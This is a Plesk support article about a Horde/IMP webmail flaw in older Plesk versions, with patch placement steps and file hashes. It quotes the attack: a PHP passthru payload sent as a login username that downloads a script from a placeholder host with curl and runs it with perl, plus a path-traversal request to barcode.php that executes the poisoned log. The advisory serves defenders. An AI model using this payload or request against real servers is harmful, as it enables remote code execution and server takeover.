Article ID: 113374, created on Apr 11, 2013, last review on Aug 12, 2014

  • Applies to:
  • Plesk 9.3 for Linux/Unix
  • Plesk 9.2 for Linux/Unix
  • Plesk 9.0 for Linux/Unix
  • Plesk 8.6 for Linux/Unix
  • Plesk 9.3 for Windows
  • Plesk 9.2 for Windows
  • Plesk 9.0 for Windows
  • Plesk 8.6 for Windows


The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example:
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:

Here is what the actual requests the attacker uses and the log entry from the psa-horde.log file would look like: - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5" - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?> [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]


Download the appropriate patch for Horde 3.1.7-3.3.2 in accordance with the platform your server runs on. Unzip it, and place the file in the corresponding folder:

/usr/share/psa-horde/lib/Horde/  - [ patch ]

%plesk_vhosts%\webmail\horde\lib\Horde\ - [ patch ]


e1f1e45a2306e896fe0f3413a8626b45 a914db3fdc7a53ddcfd1b2db8f5a1b9c 85a92ca67f2200d36506862eaa6ed6b8 c45acecf540ecd42a4bbfb242ce02b1d 40d2202ee8e3c58205a757e0eb0cbb8e aac4a8fcd879de03758354e15495d69a 7ad0184e3d7b1cf67a6c33b48c452050 31fd77b463b82e861f4fa3ac14168e1e 165ec78c924fabffe1d80dc3eabc98c6 29d1e90fd304f01e6420fbe60f66f838 6ef0db7f1685482449634a455d77d3f4 4f57df935e9acf8d18830757d2346419 9fa0130c84cac4b292697ade62270a40 b8ef5052d936e902043e41759118114e 11a46d8a188d618564f4f0cead9a50f3 56797cefb1efc9130f7c48a7d1db0f0c

Email subscription for changes to this article